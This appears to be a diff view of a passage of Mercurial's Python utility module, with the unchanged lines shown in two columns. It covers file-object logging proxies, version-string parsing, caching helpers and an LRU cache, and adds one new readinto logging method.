572 # so it can react, log, etc.
572 # so it can react, log, etc.
573 observer = object.__getattribute__(self, r'_observer')
573 observer = object.__getattribute__(self, r'_observer')
574 fn = getattr(observer, name, None)
574 fn = getattr(observer, name, None)
575 if fn:
575 if fn:
576 fn(res, *args, **kwargs)
576 fn(res, *args, **kwargs)
577
577
578 return res
578 return res
579
579
580 def close(self, *args, **kwargs):
580 def close(self, *args, **kwargs):
581 return object.__getattribute__(self, r'_observedcall')(
581 return object.__getattribute__(self, r'_observedcall')(
582 r'close', *args, **kwargs)
582 r'close', *args, **kwargs)
583
583
584 def fileno(self, *args, **kwargs):
584 def fileno(self, *args, **kwargs):
585 return object.__getattribute__(self, r'_observedcall')(
585 return object.__getattribute__(self, r'_observedcall')(
586 r'fileno', *args, **kwargs)
586 r'fileno', *args, **kwargs)
587
587
588 def flush(self, *args, **kwargs):
588 def flush(self, *args, **kwargs):
589 return object.__getattribute__(self, r'_observedcall')(
589 return object.__getattribute__(self, r'_observedcall')(
590 r'flush', *args, **kwargs)
590 r'flush', *args, **kwargs)
591
591
592 def isatty(self, *args, **kwargs):
592 def isatty(self, *args, **kwargs):
593 return object.__getattribute__(self, r'_observedcall')(
593 return object.__getattribute__(self, r'_observedcall')(
594 r'isatty', *args, **kwargs)
594 r'isatty', *args, **kwargs)
595
595
596 def readable(self, *args, **kwargs):
596 def readable(self, *args, **kwargs):
597 return object.__getattribute__(self, r'_observedcall')(
597 return object.__getattribute__(self, r'_observedcall')(
598 r'readable', *args, **kwargs)
598 r'readable', *args, **kwargs)
599
599
600 def readline(self, *args, **kwargs):
600 def readline(self, *args, **kwargs):
601 return object.__getattribute__(self, r'_observedcall')(
601 return object.__getattribute__(self, r'_observedcall')(
602 r'readline', *args, **kwargs)
602 r'readline', *args, **kwargs)
603
603
604 def readlines(self, *args, **kwargs):
604 def readlines(self, *args, **kwargs):
605 return object.__getattribute__(self, r'_observedcall')(
605 return object.__getattribute__(self, r'_observedcall')(
606 r'readlines', *args, **kwargs)
606 r'readlines', *args, **kwargs)
607
607
608 def seek(self, *args, **kwargs):
608 def seek(self, *args, **kwargs):
609 return object.__getattribute__(self, r'_observedcall')(
609 return object.__getattribute__(self, r'_observedcall')(
610 r'seek', *args, **kwargs)
610 r'seek', *args, **kwargs)
611
611
612 def seekable(self, *args, **kwargs):
612 def seekable(self, *args, **kwargs):
613 return object.__getattribute__(self, r'_observedcall')(
613 return object.__getattribute__(self, r'_observedcall')(
614 r'seekable', *args, **kwargs)
614 r'seekable', *args, **kwargs)
615
615
616 def tell(self, *args, **kwargs):
616 def tell(self, *args, **kwargs):
617 return object.__getattribute__(self, r'_observedcall')(
617 return object.__getattribute__(self, r'_observedcall')(
618 r'tell', *args, **kwargs)
618 r'tell', *args, **kwargs)
619
619
620 def truncate(self, *args, **kwargs):
620 def truncate(self, *args, **kwargs):
621 return object.__getattribute__(self, r'_observedcall')(
621 return object.__getattribute__(self, r'_observedcall')(
622 r'truncate', *args, **kwargs)
622 r'truncate', *args, **kwargs)
623
623
624 def writable(self, *args, **kwargs):
624 def writable(self, *args, **kwargs):
625 return object.__getattribute__(self, r'_observedcall')(
625 return object.__getattribute__(self, r'_observedcall')(
626 r'writable', *args, **kwargs)
626 r'writable', *args, **kwargs)
627
627
628 def writelines(self, *args, **kwargs):
628 def writelines(self, *args, **kwargs):
629 return object.__getattribute__(self, r'_observedcall')(
629 return object.__getattribute__(self, r'_observedcall')(
630 r'writelines', *args, **kwargs)
630 r'writelines', *args, **kwargs)
631
631
632 def read(self, *args, **kwargs):
632 def read(self, *args, **kwargs):
633 return object.__getattribute__(self, r'_observedcall')(
633 return object.__getattribute__(self, r'_observedcall')(
634 r'read', *args, **kwargs)
634 r'read', *args, **kwargs)
635
635
636 def readall(self, *args, **kwargs):
636 def readall(self, *args, **kwargs):
637 return object.__getattribute__(self, r'_observedcall')(
637 return object.__getattribute__(self, r'_observedcall')(
638 r'readall', *args, **kwargs)
638 r'readall', *args, **kwargs)
639
639
640 def readinto(self, *args, **kwargs):
640 def readinto(self, *args, **kwargs):
641 return object.__getattribute__(self, r'_observedcall')(
641 return object.__getattribute__(self, r'_observedcall')(
642 r'readinto', *args, **kwargs)
642 r'readinto', *args, **kwargs)
643
643
644 def write(self, *args, **kwargs):
644 def write(self, *args, **kwargs):
645 return object.__getattribute__(self, r'_observedcall')(
645 return object.__getattribute__(self, r'_observedcall')(
646 r'write', *args, **kwargs)
646 r'write', *args, **kwargs)
647
647
648 def detach(self, *args, **kwargs):
648 def detach(self, *args, **kwargs):
649 return object.__getattribute__(self, r'_observedcall')(
649 return object.__getattribute__(self, r'_observedcall')(
650 r'detach', *args, **kwargs)
650 r'detach', *args, **kwargs)
651
651
652 def read1(self, *args, **kwargs):
652 def read1(self, *args, **kwargs):
653 return object.__getattribute__(self, r'_observedcall')(
653 return object.__getattribute__(self, r'_observedcall')(
654 r'read1', *args, **kwargs)
654 r'read1', *args, **kwargs)
655
655
656 class observedbufferedinputpipe(bufferedinputpipe):
656 class observedbufferedinputpipe(bufferedinputpipe):
657 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
657 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
658
658
659 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
659 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
660 bypass ``fileobjectproxy``. Because of this, we need to make
660 bypass ``fileobjectproxy``. Because of this, we need to make
661 ``bufferedinputpipe`` aware of these operations.
661 ``bufferedinputpipe`` aware of these operations.
662
662
663 This variation of ``bufferedinputpipe`` can notify observers about
663 This variation of ``bufferedinputpipe`` can notify observers about
664 ``os.read()`` events. It also re-publishes other events, such as
664 ``os.read()`` events. It also re-publishes other events, such as
665 ``read()`` and ``readline()``.
665 ``read()`` and ``readline()``.
666 """
666 """
667 def _fillbuffer(self):
667 def _fillbuffer(self):
668 res = super(observedbufferedinputpipe, self)._fillbuffer()
668 res = super(observedbufferedinputpipe, self)._fillbuffer()
669
669
670 fn = getattr(self._input._observer, r'osread', None)
670 fn = getattr(self._input._observer, r'osread', None)
671 if fn:
671 if fn:
672 fn(res, _chunksize)
672 fn(res, _chunksize)
673
673
674 return res
674 return res
675
675
676 # We use different observer methods because the operation isn't
676 # We use different observer methods because the operation isn't
677 # performed on the actual file object but on us.
677 # performed on the actual file object but on us.
678 def read(self, size):
678 def read(self, size):
679 res = super(observedbufferedinputpipe, self).read(size)
679 res = super(observedbufferedinputpipe, self).read(size)
680
680
681 fn = getattr(self._input._observer, r'bufferedread', None)
681 fn = getattr(self._input._observer, r'bufferedread', None)
682 if fn:
682 if fn:
683 fn(res, size)
683 fn(res, size)
684
684
685 return res
685 return res
686
686
687 def readline(self, *args, **kwargs):
687 def readline(self, *args, **kwargs):
688 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
688 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
689
689
690 fn = getattr(self._input._observer, r'bufferedreadline', None)
690 fn = getattr(self._input._observer, r'bufferedreadline', None)
691 if fn:
691 if fn:
692 fn(res)
692 fn(res)
693
693
694 return res
694 return res
695
695
696 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
696 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
697 DATA_ESCAPE_MAP.update({
697 DATA_ESCAPE_MAP.update({
698 b'\\': b'\\\\',
698 b'\\': b'\\\\',
699 b'\r': br'\r',
699 b'\r': br'\r',
700 b'\n': br'\n',
700 b'\n': br'\n',
701 })
701 })
702 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
702 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
703
703
704 def escapedata(s):
704 def escapedata(s):
705 if isinstance(s, bytearray):
705 if isinstance(s, bytearray):
706 s = bytes(s)
706 s = bytes(s)
707
707
708 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
708 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
709
709
710 class fileobjectobserver(object):
710 class fileobjectobserver(object):
711 """Logs file object activity."""
711 """Logs file object activity."""
712 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
712 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
713 self.fh = fh
713 self.fh = fh
714 self.name = name
714 self.name = name
715 self.logdata = logdata
715 self.logdata = logdata
716 self.reads = reads
716 self.reads = reads
717 self.writes = writes
717 self.writes = writes
718
718
719 def _writedata(self, data):
719 def _writedata(self, data):
720 if not self.logdata:
720 if not self.logdata:
721 self.fh.write('\n')
721 self.fh.write('\n')
722 return
722 return
723
723
724 # Simple case writes all data on a single line.
724 # Simple case writes all data on a single line.
725 if b'\n' not in data:
725 if b'\n' not in data:
726 self.fh.write(': %s\n' % escapedata(data))
726 self.fh.write(': %s\n' % escapedata(data))
727 return
727 return
728
728
729 # Data with newlines is written to multiple lines.
729 # Data with newlines is written to multiple lines.
730 self.fh.write(':\n')
730 self.fh.write(':\n')
731 lines = data.splitlines(True)
731 lines = data.splitlines(True)
732 for line in lines:
732 for line in lines:
733 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
733 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
734
734
735 def read(self, res, size=-1):
735 def read(self, res, size=-1):
736 if not self.reads:
736 if not self.reads:
737 return
737 return
738 # Python 3 can return None from reads at EOF instead of empty strings.
738 # Python 3 can return None from reads at EOF instead of empty strings.
739 if res is None:
739 if res is None:
740 res = ''
740 res = ''
741
741
742 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
742 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
743 self._writedata(res)
743 self._writedata(res)
744
744
745 def readline(self, res, limit=-1):
745 def readline(self, res, limit=-1):
746 if not self.reads:
746 if not self.reads:
747 return
747 return
748
748
749 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
749 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
750 self._writedata(res)
750 self._writedata(res)
751
751
752 def readinto(self, res, dest):
753 if not self.reads:
754 return
755
756 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
757 res))
758 data = dest[0:res] if res is not None else b''
759 self._writedata(data)
760
752 def write(self, res, data):
761 def write(self, res, data):
753 if not self.writes:
762 if not self.writes:
754 return
763 return
755
764
756 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
765 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
757 self._writedata(data)
766 self._writedata(data)
758
767
759 def flush(self, res):
768 def flush(self, res):
760 if not self.writes:
769 if not self.writes:
761 return
770 return
762
771
763 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
772 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
764
773
765 # For observedbufferedinputpipe.
774 # For observedbufferedinputpipe.
766 def bufferedread(self, res, size):
775 def bufferedread(self, res, size):
767 self.fh.write('%s> bufferedread(%d) -> %d' % (
776 self.fh.write('%s> bufferedread(%d) -> %d' % (
768 self.name, size, len(res)))
777 self.name, size, len(res)))
769 self._writedata(res)
778 self._writedata(res)
770
779
771 def bufferedreadline(self, res):
780 def bufferedreadline(self, res):
772 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
781 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
773 self._writedata(res)
782 self._writedata(res)
774
783
775 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
784 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
776 logdata=False):
785 logdata=False):
777 """Turn a file object into a logging file object."""
786 """Turn a file object into a logging file object."""
778
787
779 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
788 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
780 logdata=logdata)
789 logdata=logdata)
781 return fileobjectproxy(fh, observer)
790 return fileobjectproxy(fh, observer)
782
791
783 def version():
792 def version():
784 """Return version information if available."""
793 """Return version information if available."""
785 try:
794 try:
786 from . import __version__
795 from . import __version__
787 return __version__.version
796 return __version__.version
788 except ImportError:
797 except ImportError:
789 return 'unknown'
798 return 'unknown'
790
799
791 def versiontuple(v=None, n=4):
800 def versiontuple(v=None, n=4):
792 """Parses a Mercurial version string into an N-tuple.
801 """Parses a Mercurial version string into an N-tuple.
793
802
794 The version string to be parsed is specified with the ``v`` argument.
803 The version string to be parsed is specified with the ``v`` argument.
795 If it isn't defined, the current Mercurial version string will be parsed.
804 If it isn't defined, the current Mercurial version string will be parsed.
796
805
797 ``n`` can be 2, 3, or 4. Here is how some version strings map to
806 ``n`` can be 2, 3, or 4. Here is how some version strings map to
798 returned values:
807 returned values:
799
808
800 >>> v = b'3.6.1+190-df9b73d2d444'
809 >>> v = b'3.6.1+190-df9b73d2d444'
801 >>> versiontuple(v, 2)
810 >>> versiontuple(v, 2)
802 (3, 6)
811 (3, 6)
803 >>> versiontuple(v, 3)
812 >>> versiontuple(v, 3)
804 (3, 6, 1)
813 (3, 6, 1)
805 >>> versiontuple(v, 4)
814 >>> versiontuple(v, 4)
806 (3, 6, 1, '190-df9b73d2d444')
815 (3, 6, 1, '190-df9b73d2d444')
807
816
808 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
817 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
809 (3, 6, 1, '190-df9b73d2d444+20151118')
818 (3, 6, 1, '190-df9b73d2d444+20151118')
810
819
811 >>> v = b'3.6'
820 >>> v = b'3.6'
812 >>> versiontuple(v, 2)
821 >>> versiontuple(v, 2)
813 (3, 6)
822 (3, 6)
814 >>> versiontuple(v, 3)
823 >>> versiontuple(v, 3)
815 (3, 6, None)
824 (3, 6, None)
816 >>> versiontuple(v, 4)
825 >>> versiontuple(v, 4)
817 (3, 6, None, None)
826 (3, 6, None, None)
818
827
819 >>> v = b'3.9-rc'
828 >>> v = b'3.9-rc'
820 >>> versiontuple(v, 2)
829 >>> versiontuple(v, 2)
821 (3, 9)
830 (3, 9)
822 >>> versiontuple(v, 3)
831 >>> versiontuple(v, 3)
823 (3, 9, None)
832 (3, 9, None)
824 >>> versiontuple(v, 4)
833 >>> versiontuple(v, 4)
825 (3, 9, None, 'rc')
834 (3, 9, None, 'rc')
826
835
827 >>> v = b'3.9-rc+2-02a8fea4289b'
836 >>> v = b'3.9-rc+2-02a8fea4289b'
828 >>> versiontuple(v, 2)
837 >>> versiontuple(v, 2)
829 (3, 9)
838 (3, 9)
830 >>> versiontuple(v, 3)
839 >>> versiontuple(v, 3)
831 (3, 9, None)
840 (3, 9, None)
832 >>> versiontuple(v, 4)
841 >>> versiontuple(v, 4)
833 (3, 9, None, 'rc+2-02a8fea4289b')
842 (3, 9, None, 'rc+2-02a8fea4289b')
834 """
843 """
835 if not v:
844 if not v:
836 v = version()
845 v = version()
837 parts = remod.split('[\+-]', v, 1)
846 parts = remod.split('[\+-]', v, 1)
838 if len(parts) == 1:
847 if len(parts) == 1:
839 vparts, extra = parts[0], None
848 vparts, extra = parts[0], None
840 else:
849 else:
841 vparts, extra = parts
850 vparts, extra = parts
842
851
843 vints = []
852 vints = []
844 for i in vparts.split('.'):
853 for i in vparts.split('.'):
845 try:
854 try:
846 vints.append(int(i))
855 vints.append(int(i))
847 except ValueError:
856 except ValueError:
848 break
857 break
849 # (3, 6) -> (3, 6, None)
858 # (3, 6) -> (3, 6, None)
850 while len(vints) < 3:
859 while len(vints) < 3:
851 vints.append(None)
860 vints.append(None)
852
861
853 if n == 2:
862 if n == 2:
854 return (vints[0], vints[1])
863 return (vints[0], vints[1])
855 if n == 3:
864 if n == 3:
856 return (vints[0], vints[1], vints[2])
865 return (vints[0], vints[1], vints[2])
857 if n == 4:
866 if n == 4:
858 return (vints[0], vints[1], vints[2], extra)
867 return (vints[0], vints[1], vints[2], extra)
859
868
860 def cachefunc(func):
869 def cachefunc(func):
861 '''cache the result of function calls'''
870 '''cache the result of function calls'''
862 # XXX doesn't handle keywords args
871 # XXX doesn't handle keywords args
863 if func.__code__.co_argcount == 0:
872 if func.__code__.co_argcount == 0:
864 cache = []
873 cache = []
865 def f():
874 def f():
866 if len(cache) == 0:
875 if len(cache) == 0:
867 cache.append(func())
876 cache.append(func())
868 return cache[0]
877 return cache[0]
869 return f
878 return f
870 cache = {}
879 cache = {}
871 if func.__code__.co_argcount == 1:
880 if func.__code__.co_argcount == 1:
872 # we gain a small amount of time because
881 # we gain a small amount of time because
873 # we don't need to pack/unpack the list
882 # we don't need to pack/unpack the list
874 def f(arg):
883 def f(arg):
875 if arg not in cache:
884 if arg not in cache:
876 cache[arg] = func(arg)
885 cache[arg] = func(arg)
877 return cache[arg]
886 return cache[arg]
878 else:
887 else:
879 def f(*args):
888 def f(*args):
880 if args not in cache:
889 if args not in cache:
881 cache[args] = func(*args)
890 cache[args] = func(*args)
882 return cache[args]
891 return cache[args]
883
892
884 return f
893 return f
885
894
886 class cow(object):
895 class cow(object):
887 """helper class to make copy-on-write easier
896 """helper class to make copy-on-write easier
888
897
889 Call preparewrite before doing any writes.
898 Call preparewrite before doing any writes.
890 """
899 """
891
900
892 def preparewrite(self):
901 def preparewrite(self):
893 """call this before writes, return self or a copied new object"""
902 """call this before writes, return self or a copied new object"""
894 if getattr(self, '_copied', 0):
903 if getattr(self, '_copied', 0):
895 self._copied -= 1
904 self._copied -= 1
896 return self.__class__(self)
905 return self.__class__(self)
897 return self
906 return self
898
907
899 def copy(self):
908 def copy(self):
900 """always do a cheap copy"""
909 """always do a cheap copy"""
901 self._copied = getattr(self, '_copied', 0) + 1
910 self._copied = getattr(self, '_copied', 0) + 1
902 return self
911 return self
903
912
904 class sortdict(collections.OrderedDict):
913 class sortdict(collections.OrderedDict):
905 '''a simple sorted dictionary
914 '''a simple sorted dictionary
906
915
907 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
916 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
908 >>> d2 = d1.copy()
917 >>> d2 = d1.copy()
909 >>> d2
918 >>> d2
910 sortdict([('a', 0), ('b', 1)])
919 sortdict([('a', 0), ('b', 1)])
911 >>> d2.update([(b'a', 2)])
920 >>> d2.update([(b'a', 2)])
912 >>> list(d2.keys()) # should still be in last-set order
921 >>> list(d2.keys()) # should still be in last-set order
913 ['b', 'a']
922 ['b', 'a']
914 '''
923 '''
915
924
916 def __setitem__(self, key, value):
925 def __setitem__(self, key, value):
917 if key in self:
926 if key in self:
918 del self[key]
927 del self[key]
919 super(sortdict, self).__setitem__(key, value)
928 super(sortdict, self).__setitem__(key, value)
920
929
921 if pycompat.ispypy:
930 if pycompat.ispypy:
922 # __setitem__() isn't called as of PyPy 5.8.0
931 # __setitem__() isn't called as of PyPy 5.8.0
923 def update(self, src):
932 def update(self, src):
924 if isinstance(src, dict):
933 if isinstance(src, dict):
925 src = src.iteritems()
934 src = src.iteritems()
926 for k, v in src:
935 for k, v in src:
927 self[k] = v
936 self[k] = v
928
937
929 class cowdict(cow, dict):
938 class cowdict(cow, dict):
930 """copy-on-write dict
939 """copy-on-write dict
931
940
932 Be sure to call d = d.preparewrite() before writing to d.
941 Be sure to call d = d.preparewrite() before writing to d.
933
942
934 >>> a = cowdict()
943 >>> a = cowdict()
935 >>> a is a.preparewrite()
944 >>> a is a.preparewrite()
936 True
945 True
937 >>> b = a.copy()
946 >>> b = a.copy()
938 >>> b is a
947 >>> b is a
939 True
948 True
940 >>> c = b.copy()
949 >>> c = b.copy()
941 >>> c is a
950 >>> c is a
942 True
951 True
943 >>> a = a.preparewrite()
952 >>> a = a.preparewrite()
944 >>> b is a
953 >>> b is a
945 False
954 False
946 >>> a is a.preparewrite()
955 >>> a is a.preparewrite()
947 True
956 True
948 >>> c = c.preparewrite()
957 >>> c = c.preparewrite()
949 >>> b is c
958 >>> b is c
950 False
959 False
951 >>> b is b.preparewrite()
960 >>> b is b.preparewrite()
952 True
961 True
953 """
962 """
954
963
955 class cowsortdict(cow, sortdict):
964 class cowsortdict(cow, sortdict):
956 """copy-on-write sortdict
965 """copy-on-write sortdict
957
966
958 Be sure to call d = d.preparewrite() before writing to d.
967 Be sure to call d = d.preparewrite() before writing to d.
959 """
968 """
960
969
961 class transactional(object):
970 class transactional(object):
962 """Base class for making a transactional type into a context manager."""
971 """Base class for making a transactional type into a context manager."""
963 __metaclass__ = abc.ABCMeta
972 __metaclass__ = abc.ABCMeta
964
973
965 @abc.abstractmethod
974 @abc.abstractmethod
966 def close(self):
975 def close(self):
967 """Successfully closes the transaction."""
976 """Successfully closes the transaction."""
968
977
969 @abc.abstractmethod
978 @abc.abstractmethod
970 def release(self):
979 def release(self):
971 """Marks the end of the transaction.
980 """Marks the end of the transaction.
972
981
973 If the transaction has not been closed, it will be aborted.
982 If the transaction has not been closed, it will be aborted.
974 """
983 """
975
984
976 def __enter__(self):
985 def __enter__(self):
977 return self
986 return self
978
987
979 def __exit__(self, exc_type, exc_val, exc_tb):
988 def __exit__(self, exc_type, exc_val, exc_tb):
980 try:
989 try:
981 if exc_type is None:
990 if exc_type is None:
982 self.close()
991 self.close()
983 finally:
992 finally:
984 self.release()
993 self.release()
985
994
986 @contextlib.contextmanager
995 @contextlib.contextmanager
987 def acceptintervention(tr=None):
996 def acceptintervention(tr=None):
988 """A context manager that closes the transaction on InterventionRequired
997 """A context manager that closes the transaction on InterventionRequired
989
998
990 If no transaction was provided, this simply runs the body and returns
999 If no transaction was provided, this simply runs the body and returns
991 """
1000 """
992 if not tr:
1001 if not tr:
993 yield
1002 yield
994 return
1003 return
995 try:
1004 try:
996 yield
1005 yield
997 tr.close()
1006 tr.close()
998 except error.InterventionRequired:
1007 except error.InterventionRequired:
999 tr.close()
1008 tr.close()
1000 raise
1009 raise
1001 finally:
1010 finally:
1002 tr.release()
1011 tr.release()
1003
1012
1004 @contextlib.contextmanager
1013 @contextlib.contextmanager
1005 def nullcontextmanager():
1014 def nullcontextmanager():
1006 yield
1015 yield
1007
1016
1008 class _lrucachenode(object):
1017 class _lrucachenode(object):
1009 """A node in a doubly linked list.
1018 """A node in a doubly linked list.
1010
1019
1011 Holds a reference to nodes on either side as well as a key-value
1020 Holds a reference to nodes on either side as well as a key-value
1012 pair for the dictionary entry.
1021 pair for the dictionary entry.
1013 """
1022 """
1014 __slots__ = (u'next', u'prev', u'key', u'value')
1023 __slots__ = (u'next', u'prev', u'key', u'value')
1015
1024
1016 def __init__(self):
1025 def __init__(self):
1017 self.next = None
1026 self.next = None
1018 self.prev = None
1027 self.prev = None
1019
1028
1020 self.key = _notset
1029 self.key = _notset
1021 self.value = None
1030 self.value = None
1022
1031
1023 def markempty(self):
1032 def markempty(self):
1024 """Mark the node as emptied."""
1033 """Mark the node as emptied."""
1025 self.key = _notset
1034 self.key = _notset
1026
1035
1027 class lrucachedict(object):
1036 class lrucachedict(object):
1028 """Dict that caches most recent accesses and sets.
1037 """Dict that caches most recent accesses and sets.
1029
1038
1030 The dict consists of an actual backing dict - indexed by original
1039 The dict consists of an actual backing dict - indexed by original
1031 key - and a doubly linked circular list defining the order of entries in
1040 key - and a doubly linked circular list defining the order of entries in
1032 the cache.
1041 the cache.
1033
1042
1034 The head node is the newest entry in the cache. If the cache is full,
1043 The head node is the newest entry in the cache. If the cache is full,
1035 we recycle head.prev and make it the new head. Cache accesses result in
1044 we recycle head.prev and make it the new head. Cache accesses result in
1036 the node being moved to before the existing head and being marked as the
1045 the node being moved to before the existing head and being marked as the
1037 new head node.
1046 new head node.
1038 """
1047 """
1039 def __init__(self, max):
1048 def __init__(self, max):
1040 self._cache = {}
1049 self._cache = {}
1041
1050
1042 self._head = head = _lrucachenode()
1051 self._head = head = _lrucachenode()
1043 head.prev = head
1052 head.prev = head
1044 head.next = head
1053 head.next = head
1045 self._size = 1
1054 self._size = 1
1046 self._capacity = max
1055 self._capacity = max
1047
1056
1048 def __len__(self):
1057 def __len__(self):
1049 return len(self._cache)
1058 return len(self._cache)
1050
1059
1051 def __contains__(self, k):
1060 def __contains__(self, k):
1052 return k in self._cache
1061 return k in self._cache
1053
1062
1054 def __iter__(self):
1063 def __iter__(self):
1055 # We don't have to iterate in cache order, but why not.
1064 # We don't have to iterate in cache order, but why not.
1056 n = self._head
1065 n = self._head
1057 for i in range(len(self._cache)):
1066 for i in range(len(self._cache)):
1058 yield n.key
1067 yield n.key
1059 n = n.next
1068 n = n.next
1060
1069
1061 def __getitem__(self, k):
1070 def __getitem__(self, k):
1062 node = self._cache[k]
1071 node = self._cache[k]
1063 self._movetohead(node)
1072 self._movetohead(node)
1064 return node.value
1073 return node.value
1065
1074
1066 def __setitem__(self, k, v):
1075 def __setitem__(self, k, v):
1067 node = self._cache.get(k)
1076 node = self._cache.get(k)
1068 # Replace existing value and mark as newest.
1077 # Replace existing value and mark as newest.
1069 if node is not None:
1078 if node is not None:
1070 node.value = v
1079 node.value = v
1071 self._movetohead(node)
1080 self._movetohead(node)
1072 return
1081 return
1073
1082
1074 if self._size < self._capacity:
1083 if self._size < self._capacity:
1075 node = self._addcapacity()
1084 node = self._addcapacity()
1076 else:
1085 else:
1077 # Grab the last/oldest item.
1086 # Grab the last/oldest item.
1078 node = self._head.prev
1087 node = self._head.prev
1079
1088
1080 # At capacity. Kill the old entry.
1089 # At capacity. Kill the old entry.
1081 if node.key is not _notset:
1090 if node.key is not _notset:
1082 del self._cache[node.key]
1091 del self._cache[node.key]
1083
1092
1084 node.key = k
1093 node.key = k
1085 node.value = v
1094 node.value = v
1086 self._cache[k] = node
1095 self._cache[k] = node
1087 # And mark it as newest entry. No need to adjust order since it
1096 # And mark it as newest entry. No need to adjust order since it
1088 # is already self._head.prev.
1097 # is already self._head.prev.
1089 self._head = node
1098 self._head = node
1090
1099
1091 def __delitem__(self, k):
1100 def __delitem__(self, k):
1092 node = self._cache.pop(k)
1101 node = self._cache.pop(k)
1093 node.markempty()
1102 node.markempty()
1094
1103
1095 # Temporarily mark as newest item before re-adjusting head to make
1104 # Temporarily mark as newest item before re-adjusting head to make
1096 # this node the oldest item.
1105 # this node the oldest item.
1097 self._movetohead(node)
1106 self._movetohead(node)
1098 self._head = node.next
1107 self._head = node.next
1099
1108
1100 # Additional dict methods.
1109 # Additional dict methods.
1101
1110
1102 def get(self, k, default=None):
1111 def get(self, k, default=None):
1103 try:
1112 try:
1104 return self._cache[k].value
1113 return self._cache[k].value
1105 except KeyError:
1114 except KeyError:
1106 return default
1115 return default
1107
1116
1108 def clear(self):
1117 def clear(self):
1109 n = self._head
1118 n = self._head
1110 while n.key is not _notset:
1119 while n.key is not _notset:
1111 n.markempty()
1120 n.markempty()
1112 n = n.next
1121 n = n.next
1113
1122
1114 self._cache.clear()
1123 self._cache.clear()
1115
1124
1116 def copy(self):
1125 def copy(self):
1117 result = lrucachedict(self._capacity)
1126 result = lrucachedict(self._capacity)
1118 n = self._head.prev
1127 n = self._head.prev
1119 # Iterate in oldest-to-newest order, so the copy has the right ordering
1128 # Iterate in oldest-to-newest order, so the copy has the right ordering
1120 for i in range(len(self._cache)):
1129 for i in range(len(self._cache)):
1121 result[n.key] = n.value
1130 result[n.key] = n.value
1122 n = n.prev
1131 n = n.prev
1123 return result
1132 return result
1124
1133
1125 def _movetohead(self, node):
1134 def _movetohead(self, node):
1126 """Mark a node as the newest, making it the new head.
1135 """Mark a node as the newest, making it the new head.
1127
1136
1128 When a node is accessed, it becomes the freshest entry in the LRU
1137 When a node is accessed, it becomes the freshest entry in the LRU
1129 list, which is denoted by self._head.
1138 list, which is denoted by self._head.
1130
1139
1131 Visually, let's make ``N`` the new head node (* denotes head):
1140 Visually, let's make ``N`` the new head node (* denotes head):
1132
1141
1133 previous/oldest <-> head <-> next/next newest
1142 previous/oldest <-> head <-> next/next newest
1134
1143
1135 ----<->--- A* ---<->-----
1144 ----<->--- A* ---<->-----
1136 | |
1145 | |
1137 E <-> D <-> N <-> C <-> B
1146 E <-> D <-> N <-> C <-> B
1138
1147
1139 To:
1148 To:
1140
1149
1141 ----<->--- N* ---<->-----
1150 ----<->--- N* ---<->-----
1142 | |
1151 | |
1143 E <-> D <-> C <-> B <-> A
1152 E <-> D <-> C <-> B <-> A
1144
1153
1145 This requires the following moves:
1154 This requires the following moves:
1146
1155
1147 C.next = D (node.prev.next = node.next)
1156 C.next = D (node.prev.next = node.next)
1148 D.prev = C (node.next.prev = node.prev)
1157 D.prev = C (node.next.prev = node.prev)
1149 E.next = N (head.prev.next = node)
1158 E.next = N (head.prev.next = node)
1150 N.prev = E (node.prev = head.prev)
1159 N.prev = E (node.prev = head.prev)
1151 N.next = A (node.next = head)
1160 N.next = A (node.next = head)
1152 A.prev = N (head.prev = node)
1161 A.prev = N (head.prev = node)
1153 """
1162 """
1154 head = self._head
1163 head = self._head
1155 # C.next = D
1164 # C.next = D
1156 node.prev.next = node.next
1165 node.prev.next = node.next
1157 # D.prev = C
1166 # D.prev = C
1158 node.next.prev = node.prev
1167 node.next.prev = node.prev
1159 # N.prev = E
1168 # N.prev = E
1160 node.prev = head.prev
1169 node.prev = head.prev
1161 # N.next = A
1170 # N.next = A
1162 # It is tempting to do just "head" here, however if node is
1171 # It is tempting to do just "head" here, however if node is
1163 # adjacent to head, this will do bad things.
1172 # adjacent to head, this will do bad things.
1164 node.next = head.prev.next
1173 node.next = head.prev.next
1165 # E.next = N
1174 # E.next = N
1166 node.next.prev = node
1175 node.next.prev = node
1167 # A.prev = N
1176 # A.prev = N
1168 node.prev.next = node
1177 node.prev.next = node
1169
1178
1170 self._head = node
1179 self._head = node
1171
1180
1172 def _addcapacity(self):
1181 def _addcapacity(self):
